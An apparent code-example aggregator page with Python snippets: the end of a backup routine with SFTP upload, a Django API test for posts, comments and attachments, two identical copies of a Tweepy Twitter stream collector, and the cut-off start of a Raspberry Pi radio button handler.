            retval = sub.poll()
            self.logger.logmsg('DEBUG', _('Subprocess with PID %(a)s exited with status %(b)s' % {'a': sub.pid, 'b': retval}))
            # Something wrong?
            if retval not in [EXIT_STATUS_OK, 2]:
              wasAnError = True
              self.logger.logmsg('ERROR', 'An error occurred while backing up path \'%s\'.\nPlease check the error output below to determine if any files are incomplete or missing.' % str(i))
              self.logger.logmsg('ERROR', _('Process exited with status %(a)s. Errors: %(b)s' % {'a': retval, 'b': ''.join(errors)}))

    self.ifCancel()
    # A test is included to ensure sure the archive actually exists, as if
    # wasAnError = True the archive might not even exist.
    if self.options['Engine'].startswith('tar') and self.options['DestinationType'] == 'remote (ssh)' and os.path.exists(encode(self.dest)):
      self.logger.logmsg('DEBUG', _('Sending files to server via SFTP'))
      self._status = STATUS_SENDING_TO_REMOTE
      client, sftpClient = sftp.connect(self.options['RemoteHost'], self.options['RemoteUsername'], self.options['RemotePassword'], self.options['RemotePort'])
      try:
        sftp.putFile(sftpClient, self.dest, self.options['RemoteFolder'])
        os.remove(self.dest)
      except:
        import sys
        import traceback
        wasAnError = True
        self.logger.logmsg('DEBUG', _('Could not send file(s) or folder to server:'))
        (etype, value, tb) = sys.exc_info()
        self.logger.logmsg('DEBUG', ''.join(traceback.format_exception(etype, value, tb)))
      sftpClient.close()
      client.close()

    # finally, we do this
    self._current = self._total
    time.sleep(1)
    self.ifCancel()
    return (not wasAnError)

Example 19

Project: PiplMesh
Source File: test_basic.py
View license
    def test_basic(self):
        # Creating a post

        response = self.client.post(self.resourceListURI('post'), '{"message": "Test post."}', content_type='application/json')
        self.assertEqual(response.status_code, 201)

        post_uri = response['location']

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['message'], 'Test post.')
        self.assertEqual(response['author']['username'], self.user_username)
        self.assertNotEqual(response['created_time'], None)
        self.assertNotEqual(response['updated_time'], None)
        self.assertEqual(response['comments'], [])
        self.assertEqual(response['attachments'], [])
        self.assertEqual(response['is_published'], False)

        post_created_time = response['created_time']
        post_updated_time = response['updated_time']

        # Delay so next update will be for sure different
        time.sleep(1)

        # Test authorization
        response = self.client2.get(post_uri, content_type='application/json')
        self.assertEqual(response.status_code, 404)

        # Adding an attachment

        attachments_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'attachments/'

        response = self.client.post(attachments_resource_uri, '{"link_url": "http://wlan-si.net/", "link_caption": "wlan slovenija"}', content_type='application/json; type=link')
        self.assertEqual(response.status_code, 201)

        attachment_uri = response['location']

        response = self.client.get(attachment_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['link_url'], 'http://wlan-si.net/')
        self.assertEqual(response['link_caption'], 'wlan slovenija')
        self.assertEqual(response['link_description'], '')
        self.assertEqual(response['author']['username'], self.user_username)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['attachments'][0]['link_url'], 'http://wlan-si.net/')
        self.assertEqual(response['attachments'][0]['link_caption'], 'wlan slovenija')
        self.assertEqual(response['attachments'][0]['link_description'], '')
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        post_updated_time = response['updated_time']

        # Delay so next update will be for sure different
        time.sleep(1)

        # Publishing a post

        response = self.client.patch(post_uri, '{"is_published": true}', content_type='application/json')
        self.assertEqual(response.status_code, 202)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['is_published'], True)
        
        # Test authorization
        response = self.client2.get(post_uri, content_type='application/json')
        self.assertEqual(response.status_code, 200)

        # Checking updates

        self.assertEqual(len(self.updates_data), 1)
        self.assertEqual(self.updates_data[0]['channel_id'], tasks.HOME_CHANNEL_ID)
        self.assertTrue(self.updates_data[0]['already_serialized'])

        post = json.loads(self.updates_data[0]['data'])

        self.assertEqual(post['type'], 'post_published')
        self.assertEqual(post['post']['message'], 'Test post.')
        self.assertEqual(post['post']['author']['username'], self.user_username)
        self.assertEqual(post['post']['comments'], [])
        self.assertEqual(post['post']['attachments'][0]['link_url'], 'http://wlan-si.net/')
        self.assertEqual(post['post']['attachments'][0]['link_caption'], 'wlan slovenija')
        self.assertEqual(post['post']['attachments'][0]['link_description'], '')
        self.assertEqual(post['post']['created_time'], post_created_time)
        self.assertEqual(post['post']['is_published'], True)

        # Adding a comment

        comments_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'comments/'

        response = self.client.post(comments_resource_uri, '{"message": "Test comment."}', content_type='application/json')
        self.assertEqual(response.status_code, 201)

        comment_uri = response['location']

        response = self.client.get(comment_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['message'], 'Test comment.')
        self.assertEqual(response['author']['username'], self.user_username)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['comments'][0], self.fullURItoAbsoluteURI(comment_uri))
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        post_updated_time = response['updated_time']

        # Delay so next update will be for sure different
        time.sleep(1)

        # Adding hug on post

        hugs_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'hugs/'

        response = self.client.post(hugs_resource_uri, content_type='application/json')
        self.assertEqual(response.status_code, 201)

        hug_uri = response['location']

        response = self.client.get(hug_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['author']['username'], self.user_username)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['hugs'][0]['resource_uri'], self.fullURItoAbsoluteURI(hug_uri))
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        post_updated_time = response['updated_time']

        # Delay so next update will be for sure different
        time.sleep(1)

        # Adding run on post

        runs_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'runs/'

        response = self.client.post(runs_resource_uri, content_type='application/json')
        self.assertEqual(response.status_code, 201)

        run_uri = response['location']

        response = self.client.get(run_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['author']['username'], self.user_username)

        response = self.client.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['runs'][0]['resource_uri'], self.fullURItoAbsoluteURI(run_uri))
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        self.assertEqual(response['hugs'], [])

        previous_runs = response['runs']

        post_updated_time = response['updated_time']

        # Delay so next update will be for sure different
        time.sleep(1)


        # Adding another hug on post by client 2

        hugs_resource_uri = self.fullURItoAbsoluteURI(post_uri) + 'hugs/'

        response = self.client2.post(hugs_resource_uri, content_type='application/json')
        self.assertEqual(response.status_code, 201)

        hug_uri = response['location']

        response = self.client2.get(hug_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['author']['username'], self.user_username2)

        response = self.client2.get(post_uri)
        self.assertEqual(response.status_code, 200)
        response = json.loads(response.content)

        self.assertEqual(response['runs'], previous_runs)

        self.assertEqual(response['hugs'][0]['resource_uri'], self.fullURItoAbsoluteURI(hug_uri))
        self.assertEqual(response['created_time'], post_created_time)
        self.assertNotEqual(response['updated_time'], post_updated_time)

        post_updated_time = response['updated_time']

        # Delay so next update will be for sure different
        time.sleep(1)

Example 20

Project: stack
Source File: ThreadedCollector.py
View license
def go(collection_type, project_id, collector_id, rawdir, logdir):
    if collection_type not in ['track', 'follow', 'none']:
        print "ThreadedCollector accepts inputs 'track', 'follow', or 'none'."
        print 'Exiting with invalid params...'
        sys.exit()
    else:
        # Grab collector & project details from DB
        project = db.get_project_detail(project_id)
        resp = db.get_collector_detail(project_id, collector_id)

        if project['status'] and resp['status']:
            collector = resp['collector']
            configdb = project['project_config_db']
            project_config_db = db.connection[configdb]
            project_config_db = project_config_db.config
            collector_name = collector['collector_name']
            project_name = project['project_name']
        else:
            'Invalid project account & collector. Try again!'

    # module_config = project_config_db.find_one({'module': 'twitter'})

    # Reference for controller if script is active or not.
    project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'active': 1}})

    Config = ConfigParser.ConfigParser()
    Config.read(PLATFORM_CONFIG_FILE)

    # Creates logger w/ level INFO
    logger = logging.getLogger(collector_name)
    logger.setLevel(logging.INFO)
    # Creates rotating file handler w/ level INFO
    fh = logging.handlers.TimedRotatingFileHandler(logdir + '/' + project_name + '-' + collector_name + '-' + collection_type + '-collector-log-' + collector_id + '.out', 'D', 1, 30, None, False, False)
    fh.setLevel(logging.INFO)
    # Creates formatter and applies to rotating handler
    format = '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
    datefmt = '%m-%d %H:%M'
    formatter = logging.Formatter(format, datefmt)
    fh.setFormatter(formatter)
    # Finishes by adding the rotating, formatted handler
    logger.addHandler(fh)

    # Sets current date as starting point
    tmpDate = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    logger.info('Starting collection system at %s' % tmpDate)
    logger.info('Collector name: %s' % collector_name)

    # Grabs tweets out file info from config
    # TODO - move this info to Mongo
    tweetsOutFilePath = rawdir + '/'
    if not os.path.exists(tweetsOutFilePath):
        os.makedirs(tweetsOutFilePath)
    tweetsOutFileDateFrmt = Config.get('files', 'tweets_file_date_frmt', 0)
    tweetsOutFile = Config.get('files', 'tweets_file', 0)

    # NOTE - proper naming for api_auth dictionary from front_end
    oauth_info = collector['api_auth']

    consumerKey = oauth_info['consumer_key']
    consumerSecret = oauth_info['consumer_secret']
    accessToken = oauth_info['access_token']
    accessTokenSecret = oauth_info['access_token_secret']

    # Authenticates via app info
    auth = OAuthHandler(consumerKey, consumerSecret)
    auth.set_access_token(accessToken, accessTokenSecret)

    # Sets Mongo collection; sets rate_limitng & error counts to 0
    if 'stream_limit_loss' not in collector:
        project_config_db.update({'_id': ObjectId(collector_id)}, {'$set' : { 'stream_limit_loss': { 'counts': [], 'total': 0 }}})

    if 'rate_limit_count' not in collector:
        project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'rate_limit_count': 0}})

    if 'error_code' not in collector:
        project_config_db.update({"_id" : ObjectId(collector_id)}, {'$set' : {'error_code': 0}})

    runCollector = collector['collector']['run']

    if runCollector:
        print 'Starting process w/ start signal %d' % runCollector
        logger.info('Starting process w/ start signal %d' % runCollector)
    collectingData = False

    i = 0
    myThreadCounter = 0
    runLoopSleep = 0

    while runCollector:
        i += 1

        # Finds Mongo collection & grabs signal info
        # If Mongo is offline throws an acception and continues
        exception = None
        try:
            resp = db.get_collector_detail(project_id, collector_id)
            collector = resp['collector']
            flags = collector['collector']
            runCollector = flags['run']
            collectSignal = flags['collect']
            updateSignal = flags['update']
        except Exception, exception:
            logger.info('Mongo connection refused with exception: %s' % exception)

        """
        Collection process is running, and:
        A) An update has been triggered -OR-
        B) The collection signal is not set -OR-
        C) Run signal is not set
        """
        if collectingData and (updateSignal or not collectSignal or not runCollector):
            # Update has been triggered
            if updateSignal:
                logger.info('MAIN: received UPDATE signal. Attempting to stop collection thread')
                resp = db.set_collector_status(project_id, collector_id, collector_status=1)
            # Collection thread triggered to stop
            if not collectSignal:
                logger.info('MAIN: received STOP signal. Attempting to stop collection thread')
            # Entire process trigerred to stop
            if not runCollector:
                logger.info('MAIN: received EXIT signal. Attempting to stop collection thread')
                resp = db.set_collector_status(project_id, collector_id, collector_status=0)
                collectSignal = 0

            # Send stream disconnect signal, kills thread
            stream.disconnect()
            wait_count = 0
            while e.isSet() is False:
                wait_count += 1
                print '%d) Waiting on collection thread shutdown' % wait_count
                sleep(wait_count)

            collectingData = False

            logger.info('COLLECTION THREAD: stream stopped after %d tweets' % l.tweet_count)
            logger.info('COLLECTION THREAD: collected %d error tweets' % l.delete_count)
            print 'COLLECTION THREAD: collected %d error tweets' % l.delete_count
            logger.info('COLLECTION THREAD: lost %d tweets to stream rate limit' % l.limit_count)
            print 'COLLECTION THREAD: lost %d tweets to stream rate limit' % l.limit_count
            print 'COLLECTION THREAD: stream stopped after %d tweets' % l.tweet_count

            if not l.error_code == 0:
                resp = db.set_collector_status(project_id, collector_id, collector_status=0)
                project_config_db.update({"_id" : ObjectId(collector_id)}, {'$set' : {'error_code': l.error_code}})

            if not l.limit_count == 0:
                project_config_db.update({'_id': ObjectId(collector_id)}, {'$set' : { 'stream_limit_loss.total': l.limit_count}})

            if not l.rate_limit_count == 0:
                project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'rate_limit_count': 0}})

        # Collection has been signaled & main program thread is running
        # TODO - Check Mongo for handle:ID pairs
        # Only call for new pairs
        if collectSignal and (threading.activeCount() == 1):
            # Names collection thread & adds to counter
            myThreadCounter += 1
            myThreadName = 'collector-' + collection_type + '%s' % myThreadCounter

            termsList = collector['terms_list']
            if termsList:
                print 'Terms list length: ' + str(len(termsList))

                # Grab IDs for follow stream
                if collection_type == 'follow':
                    """
                    TODO - Update Mongo terms w/ set for collect status 0 or 1
                    # Updates current stored handles to collect 0 if no longer listed in terms file
                    stored_terms = doc['termsList']
                    for user in stored_terms:
                        if user['handle'] not in termsList:
                            user_id = user['id']
                            mongo_config.update({'module': 'collector-follow'},
                                {'$pull': {'termsList': {'handle': user['handle']}}})
                            mongo_config.update({'module': 'collecting-follow'},
                                {'$set': {'termsList': {'handle': user['handle'], 'id': user_id, 'collect': 0 }}})

                    # Loops thru current stored handles and adds list if both:
                    #   A) Value isn't set to None (not valid OR no longer in use)
                    all_stored_handles = [user['handle'] for user in stored_terms]
                    stored_handles = [user['handle'] for user in stored_terms if user['id'] and user['collect']]

                    print 'MAIN: %d user ids for collection found in Mongo!' % len(stored_handles)
                    """

                    # Loop thru & query (except handles that have been stored)
                    print 'MAIN: Querying Twitter API for handle:id pairs...'
                    logger.info('MAIN: Querying Twitter API for handle:id pairs...')
                    # Initiates REST API connection
                    twitter_api = API(auth_handler=auth)
                    failed_handles = []
                    success_handles = []
                    # Loops thru user-given terms list
                    for item in termsList:
                        term = item['term']
                        # If term already has a valid ID, pass
                        if item['id'] is not None:
                            pass
                        # Queries the Twitter API for the ID value of the handle
                        else:
                            try:
                                user = twitter_api.get_user(screen_name=term)
                            except TweepError as tweepy_exception:
                                error_message = tweepy_exception.args[0][0]['message']
                                code = tweepy_exception.args[0][0]['code']
                                # Rate limited for 15 minutes w/ code 88
                                if code == 88:
                                    print 'MAIN: User ID grab rate limited. Sleeping for 15 minutes.'
                                    logger.exception('MAIN: User ID grab rate limited. Sleeping for 15 minutes.')
                                    time.sleep(900)
                                # Handle doesn't exist, added to Mongo as None
                                elif code == 34:
                                    print 'MAIN: User w/ handle %s does not exist.' % term
                                    logger.exception('MAIN: User w/ handle %s does not exist.' % term)
                                    item['collect'] = 0
                                    item['id'] = None
                                    failed_handles.append(term)
                            # Success - handle:ID pair stored in Mongo
                            else:
                                user_id = user._json['id_str']
                                item['id'] = user_id
                                success_handles.append(term)

                    print 'MAIN: Collected %d new ids for follow stream.' % len(success_handles)
                    logger.info('MAIN: Collected %d new ids for follow stream.' % len(success_handles))
                    print 'MAIN: %d handles failed to be found.' % len(failed_handles)
                    logger.info('MAIN: %d handles failed to be found.' % len(failed_handles))
                    logger.info(failed_handles)
                    print failed_handles
                    print 'MAIN: Grabbing full list of follow stream IDs from Mongo.'
                    logger.info('MAIN: Grabbing full list of follow stream IDs from Mongo.')

                    # Updates term list with follow values
                    project_config_db.update({'_id': ObjectId(collector_id)},
                        {'$set': {'terms_list': termsList}})

                    # Loops thru current stored handles and adds to list if:
                    #   A) Value isn't set to None (not valid OR no longer in use)
                    ids = [item['id'] for item in termsList if item['id'] and item['collect']]
                    noncoll = [item['term'] for item in termsList if not item['collect']]
                    termsList = ids
                else:
                    terms = [item['term'] for item in termsList if item['collect']]
                    noncoll = [item['term'] for item in termsList if not item['collect']]
                    termsList = terms

                print 'Terms List: '
                print termsList
                print ''
                print 'Not collecting for: '
                print noncoll
                print ''

                logger.info('Terms list: %s' % str(termsList).strip('[]'))
                logger.info('Not collecting for: %s' % str(noncoll).strip('[]'))

            print 'COLLECTION THREAD: Initializing Tweepy listener instance...'
            logger.info('COLLECTION THREAD: Initializing Tweepy listener instance...')
            l = fileOutListener(tweetsOutFilePath, tweetsOutFileDateFrmt, tweetsOutFile, logger, collection_type, project_id, collector_id)

            print 'TOOLKIT STREAM: Initializing Tweepy stream listener...'
            logger.info('TOOLKIT STREAM: Initializing Tweepy stream listener...')

            # Initiates async stream via Tweepy, which handles the threading
            # TODO - location & language

            languages = collector['languages']
            location = collector['location']

            if languages:
                print '%s language codes found!' % len(languages)
            if location:
                print 'Location points found!'
                for i in range(len(location)):
                    location[i] = float(location[i])

            stream = ToolkitStream(auth, l, logger, project_id, collector_id, retry_count=100)
            if collection_type == 'track':
                stream.filter(track=termsList, languages=languages, locations=location, async=True)
            elif collection_type == 'follow':
                stream.filter(follow=termsList, languages=languages, locations=location, async=True)
            elif collection_type == 'none':
                stream.filter(locations=location, languages=languages, async=True)
            else:
                sys.exit('ERROR: Unrecognized stream filter.')

            collectingData = True
            print 'MAIN: Collection thread started (%s)' % myThreadName
            logger.info('MAIN: Collection thread started (%s)' % myThreadName)


        #if threading.activeCount() == 1:
        #    print "MAIN: %d iteration with no collection thread running" % i
        #else:
        #    print "MAIN: %d iteration with collection thread running (%d)" % (i, threading.activeCount())

        # Incrementally delays loop if Mongo is offline, otherwise 2 seconds
        max_sleep_time = 1800
        if exception:
            if runLoopSleep < max_sleep_time:
                runLoopSleep += 2
            else:
                runLoopSleep = max_sleep_time
            print "Exception caught, sleeping for: %d" % runLoopSleep
            time.sleep(runLoopSleep)
        else:
            time.sleep( 2 )

    logger.info('Exiting Collection Program...')
    print 'Exiting Collection Program...'

    # Reference for controller if script is active or not.
    project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'active': 0}})

Example 21

Project: stack
Source File: ThreadedCollector.py
View license
def go(collection_type, project_id, collector_id, rawdir, logdir):
    if collection_type not in ['track', 'follow', 'none']:
        print "ThreadedCollector accepts inputs 'track', 'follow', or 'none'."
        print 'Exiting with invalid params...'
        sys.exit()
    else:
        # Grab collector & project details from DB
        project = db.get_project_detail(project_id)
        resp = db.get_collector_detail(project_id, collector_id)

        if project['status'] and resp['status']:
            collector = resp['collector']
            configdb = project['project_config_db']
            project_config_db = db.connection[configdb]
            project_config_db = project_config_db.config
            collector_name = collector['collector_name']
            project_name = project['project_name']
        else:
            'Invalid project account & collector. Try again!'

    # module_config = project_config_db.find_one({'module': 'twitter'})

    # Reference for controller if script is active or not.
    project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'active': 1}})

    Config = ConfigParser.ConfigParser()
    Config.read(PLATFORM_CONFIG_FILE)

    # Creates logger w/ level INFO
    logger = logging.getLogger(collector_name)
    logger.setLevel(logging.INFO)
    # Creates rotating file handler w/ level INFO
    fh = logging.handlers.TimedRotatingFileHandler(logdir + '/' + project_name + '-' + collector_name + '-' + collection_type + '-collector-log-' + collector_id + '.out', 'D', 1, 30, None, False, False)
    fh.setLevel(logging.INFO)
    # Creates formatter and applies to rotating handler
    format = '%(asctime)s %(name)-12s %(levelname)-8s %(message)s'
    datefmt = '%m-%d %H:%M'
    formatter = logging.Formatter(format, datefmt)
    fh.setFormatter(formatter)
    # Finishes by adding the rotating, formatted handler
    logger.addHandler(fh)

    # Sets current date as starting point
    tmpDate = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
    logger.info('Starting collection system at %s' % tmpDate)
    logger.info('Collector name: %s' % collector_name)

    # Grabs tweets out file info from config
    # TODO - move this info to Mongo
    tweetsOutFilePath = rawdir + '/'
    if not os.path.exists(tweetsOutFilePath):
        os.makedirs(tweetsOutFilePath)
    tweetsOutFileDateFrmt = Config.get('files', 'tweets_file_date_frmt', 0)
    tweetsOutFile = Config.get('files', 'tweets_file', 0)

    # NOTE - proper naming for api_auth dictionary from front_end
    oauth_info = collector['api_auth']

    consumerKey = oauth_info['consumer_key']
    consumerSecret = oauth_info['consumer_secret']
    accessToken = oauth_info['access_token']
    accessTokenSecret = oauth_info['access_token_secret']

    # Authenticates via app info
    auth = OAuthHandler(consumerKey, consumerSecret)
    auth.set_access_token(accessToken, accessTokenSecret)

    # Sets Mongo collection; sets rate_limitng & error counts to 0
    if 'stream_limit_loss' not in collector:
        project_config_db.update({'_id': ObjectId(collector_id)}, {'$set' : { 'stream_limit_loss': { 'counts': [], 'total': 0 }}})

    if 'rate_limit_count' not in collector:
        project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'rate_limit_count': 0}})

    if 'error_code' not in collector:
        project_config_db.update({"_id" : ObjectId(collector_id)}, {'$set' : {'error_code': 0}})

    runCollector = collector['collector']['run']

    if runCollector:
        print 'Starting process w/ start signal %d' % runCollector
        logger.info('Starting process w/ start signal %d' % runCollector)
    collectingData = False

    i = 0
    myThreadCounter = 0
    runLoopSleep = 0

    while runCollector:
        i += 1

        # Finds Mongo collection & grabs signal info
        # If Mongo is offline throws an acception and continues
        exception = None
        try:
            resp = db.get_collector_detail(project_id, collector_id)
            collector = resp['collector']
            flags = collector['collector']
            runCollector = flags['run']
            collectSignal = flags['collect']
            updateSignal = flags['update']
        except Exception, exception:
            logger.info('Mongo connection refused with exception: %s' % exception)

        """
        Collection process is running, and:
        A) An update has been triggered -OR-
        B) The collection signal is not set -OR-
        C) Run signal is not set
        """
        if collectingData and (updateSignal or not collectSignal or not runCollector):
            # Update has been triggered
            if updateSignal:
                logger.info('MAIN: received UPDATE signal. Attempting to stop collection thread')
                resp = db.set_collector_status(project_id, collector_id, collector_status=1)
            # Collection thread triggered to stop
            if not collectSignal:
                logger.info('MAIN: received STOP signal. Attempting to stop collection thread')
            # Entire process trigerred to stop
            if not runCollector:
                logger.info('MAIN: received EXIT signal. Attempting to stop collection thread')
                resp = db.set_collector_status(project_id, collector_id, collector_status=0)
                collectSignal = 0

            # Send stream disconnect signal, kills thread
            stream.disconnect()
            wait_count = 0
            while e.isSet() is False:
                wait_count += 1
                print '%d) Waiting on collection thread shutdown' % wait_count
                sleep(wait_count)

            collectingData = False

            logger.info('COLLECTION THREAD: stream stopped after %d tweets' % l.tweet_count)
            logger.info('COLLECTION THREAD: collected %d error tweets' % l.delete_count)
            print 'COLLECTION THREAD: collected %d error tweets' % l.delete_count
            logger.info('COLLECTION THREAD: lost %d tweets to stream rate limit' % l.limit_count)
            print 'COLLECTION THREAD: lost %d tweets to stream rate limit' % l.limit_count
            print 'COLLECTION THREAD: stream stopped after %d tweets' % l.tweet_count

            if not l.error_code == 0:
                resp = db.set_collector_status(project_id, collector_id, collector_status=0)
                project_config_db.update({"_id" : ObjectId(collector_id)}, {'$set' : {'error_code': l.error_code}})

            if not l.limit_count == 0:
                project_config_db.update({'_id': ObjectId(collector_id)}, {'$set' : { 'stream_limit_loss.total': l.limit_count}})

            if not l.rate_limit_count == 0:
                project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'rate_limit_count': 0}})

        # Collection has been signaled & main program thread is running
        # TODO - Check Mongo for handle:ID pairs
        # Only call for new pairs
        if collectSignal and (threading.activeCount() == 1):
            # Names collection thread & adds to counter
            myThreadCounter += 1
            myThreadName = 'collector-' + collection_type + '%s' % myThreadCounter

            termsList = collector['terms_list']
            if termsList:
                print 'Terms list length: ' + str(len(termsList))

                # Grab IDs for follow stream
                if collection_type == 'follow':
                    """
                    TODO - Update Mongo terms w/ set for collect status 0 or 1
                    # Updates current stored handles to collect 0 if no longer listed in terms file
                    stored_terms = doc['termsList']
                    for user in stored_terms:
                        if user['handle'] not in termsList:
                            user_id = user['id']
                            mongo_config.update({'module': 'collector-follow'},
                                {'$pull': {'termsList': {'handle': user['handle']}}})
                            mongo_config.update({'module': 'collecting-follow'},
                                {'$set': {'termsList': {'handle': user['handle'], 'id': user_id, 'collect': 0 }}})

                    # Loops thru current stored handles and adds list if both:
                    #   A) Value isn't set to None (not valid OR no longer in use)
                    all_stored_handles = [user['handle'] for user in stored_terms]
                    stored_handles = [user['handle'] for user in stored_terms if user['id'] and user['collect']]

                    print 'MAIN: %d user ids for collection found in Mongo!' % len(stored_handles)
                    """

                    # Loop thru & query (except handles that have been stored)
                    print 'MAIN: Querying Twitter API for handle:id pairs...'
                    logger.info('MAIN: Querying Twitter API for handle:id pairs...')
                    # Initiates REST API connection
                    twitter_api = API(auth_handler=auth)
                    failed_handles = []
                    success_handles = []
                    # Loops thru user-given terms list
                    for item in termsList:
                        term = item['term']
                        # If term already has a valid ID, pass
                        if item['id'] is not None:
                            pass
                        # Queries the Twitter API for the ID value of the handle
                        else:
                            try:
                                user = twitter_api.get_user(screen_name=term)
                            except TweepError as tweepy_exception:
                                error_message = tweepy_exception.args[0][0]['message']
                                code = tweepy_exception.args[0][0]['code']
                                # Rate limited for 15 minutes w/ code 88
                                if code == 88:
                                    print 'MAIN: User ID grab rate limited. Sleeping for 15 minutes.'
                                    logger.exception('MAIN: User ID grab rate limited. Sleeping for 15 minutes.')
                                    time.sleep(900)
                                # Handle doesn't exist, added to Mongo as None
                                elif code == 34:
                                    print 'MAIN: User w/ handle %s does not exist.' % term
                                    logger.exception('MAIN: User w/ handle %s does not exist.' % term)
                                    item['collect'] = 0
                                    item['id'] = None
                                    failed_handles.append(term)
                            # Success - handle:ID pair stored in Mongo
                            else:
                                user_id = user._json['id_str']
                                item['id'] = user_id
                                success_handles.append(term)

                    print 'MAIN: Collected %d new ids for follow stream.' % len(success_handles)
                    logger.info('MAIN: Collected %d new ids for follow stream.' % len(success_handles))
                    print 'MAIN: %d handles failed to be found.' % len(failed_handles)
                    logger.info('MAIN: %d handles failed to be found.' % len(failed_handles))
                    logger.info(failed_handles)
                    print failed_handles
                    print 'MAIN: Grabbing full list of follow stream IDs from Mongo.'
                    logger.info('MAIN: Grabbing full list of follow stream IDs from Mongo.')

                    # Updates term list with follow values
                    project_config_db.update({'_id': ObjectId(collector_id)},
                        {'$set': {'terms_list': termsList}})

                    # Loops thru current stored handles and adds to list if:
                    #   A) Value isn't set to None (not valid OR no longer in use)
                    ids = [item['id'] for item in termsList if item['id'] and item['collect']]
                    noncoll = [item['term'] for item in termsList if not item['collect']]
                    termsList = ids
                else:
                    terms = [item['term'] for item in termsList if item['collect']]
                    noncoll = [item['term'] for item in termsList if not item['collect']]
                    termsList = terms

                print 'Terms List: '
                print termsList
                print ''
                print 'Not collecting for: '
                print noncoll
                print ''

                logger.info('Terms list: %s' % str(termsList).strip('[]'))
                logger.info('Not collecting for: %s' % str(noncoll).strip('[]'))

            print 'COLLECTION THREAD: Initializing Tweepy listener instance...'
            logger.info('COLLECTION THREAD: Initializing Tweepy listener instance...')
            l = fileOutListener(tweetsOutFilePath, tweetsOutFileDateFrmt, tweetsOutFile, logger, collection_type, project_id, collector_id)

            print 'TOOLKIT STREAM: Initializing Tweepy stream listener...'
            logger.info('TOOLKIT STREAM: Initializing Tweepy stream listener...')

            # Initiates async stream via Tweepy, which handles the threading
            # TODO - location & language

            languages = collector['languages']
            location = collector['location']

            if languages:
                print '%s language codes found!' % len(languages)
            if location:
                print 'Location points found!'
                for i in range(len(location)):
                    location[i] = float(location[i])

            stream = ToolkitStream(auth, l, logger, project_id, collector_id, retry_count=100)
            if collection_type == 'track':
                stream.filter(track=termsList, languages=languages, locations=location, async=True)
            elif collection_type == 'follow':
                stream.filter(follow=termsList, languages=languages, locations=location, async=True)
            elif collection_type == 'none':
                stream.filter(locations=location, languages=languages, async=True)
            else:
                sys.exit('ERROR: Unrecognized stream filter.')

            collectingData = True
            print 'MAIN: Collection thread started (%s)' % myThreadName
            logger.info('MAIN: Collection thread started (%s)' % myThreadName)


        #if threading.activeCount() == 1:
        #    print "MAIN: %d iteration with no collection thread running" % i
        #else:
        #    print "MAIN: %d iteration with collection thread running (%d)" % (i, threading.activeCount())

        # Incrementally delays loop if Mongo is offline, otherwise 2 seconds
        max_sleep_time = 1800
        if exception:
            if runLoopSleep < max_sleep_time:
                runLoopSleep += 2
            else:
                runLoopSleep = max_sleep_time
            print "Exception caught, sleeping for: %d" % runLoopSleep
            time.sleep(runLoopSleep)
        else:
            time.sleep( 2 )

    logger.info('Exiting Collection Program...')
    print 'Exiting Collection Program...'

    # Reference for controller if script is active or not.
    project_config_db.update({'_id': ObjectId(collector_id)}, {'$set': {'active': 0}})

Example 22

Project: piradio
Source File: radio4.py
View license
def get_switch_states(lcd,radio,rss):
	interrupt = False       # Interrupt display
	switch = radio.getSwitch()
	display_mode = radio.getDisplayMode()
	input_source = radio.getSource()
	option = radio.getOption()

	if switch == MENU_SWITCH:
		log.message("MENU switch", log.DEBUG)
		if radio.muted():
			unmuteRadio(lcd,radio)
		
		display_mode = display_mode + 1

		# Skip RSS mode if not available
		if display_mode == radio.MODE_RSS:
			if rss.isAvailable() and not radio.optionChanged():
				lcd.line3("Getting RSS feed")
			else:
				display_mode = display_mode + 1

		if display_mode > radio.MODE_LAST:
			display_mode = radio.MODE_TIME

		radio.setDisplayMode(display_mode)
		log.message("New mode " + radio.getDisplayModeString()+
					"(" + str(display_mode) + ")", log.DEBUG)

		# Shutdown if menu button held for > 3 seconds
		MenuSwitch = GPIO.input(MENU_SWITCH)
		count = 15
		while MenuSwitch:
			time.sleep(0.2)
			MenuSwitch = GPIO.input(MENU_SWITCH)
			count = count - 1
			if count < 0:
				log.message("Shutdown", log.DEBUG)
				MenuSwitch = False
				radio.setDisplayMode(radio.MODE_SHUTDOWN)

		if radio.getUpdateLibrary():
			update_library(lcd,radio)	
			radio.setDisplayMode(radio.MODE_TIME)

		elif radio.getReload(): 
